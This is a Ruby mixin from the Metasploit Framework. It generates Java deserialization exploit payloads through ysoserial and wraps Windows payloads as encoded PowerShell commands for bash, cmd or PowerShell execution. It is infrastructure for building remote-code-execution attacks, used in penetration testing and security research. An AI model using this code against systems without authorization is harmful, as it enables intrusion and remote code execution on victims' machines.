# -*- coding: binary -*-

module Msf

module Exploit::JavaDeserialization

  include Msf::Exploit::Powershell

  def generate_java_deserialization_for_command(name, shell, command)
    # here we force usage of a modified type to avoid compatibility issues with command characters thar are present in
    # some ysoserial payloads
    unless %w{ bash cmd powershell }.include? shell
      raise RuntimeError, 'Invalid shell for Java Deserialization payload generation'
    end

    Msf::Util::JavaDeserialization.ysoserial_payload(name, command, modified_type: shell)
  end

  def generate_java_deserialization_for_payload(name, payload)
    command = nil

    if payload.platform.platforms == [Msf::Module::Platform::Windows]
      if [ Rex::Arch::ARCH_X86, Rex::Arch::ARCH_X64 ].include? payload.arch.first
        command = cmd_psh_payload(payload.encoded, payload.arch.first, { remove_comspec: true, encode_final_payload: true })
      elsif payload.arch.first == Rex::Arch::ARCH_CMD
        command = payload.encoded
      end
      modified_type = 'cmd'
    else
      if payload.arch.first == Rex::Arch::ARCH_CMD
        command = payload.encoded
      end
      modified_type = 'bash'
    end

    if command.nil?
      raise RuntimeError, 'Could not generate the payload for the platform/architecture combination'
    end

    Msf::Util::JavaDeserialization.ysoserial_payload(name, command, modified_type: modified_type)
  end

end
end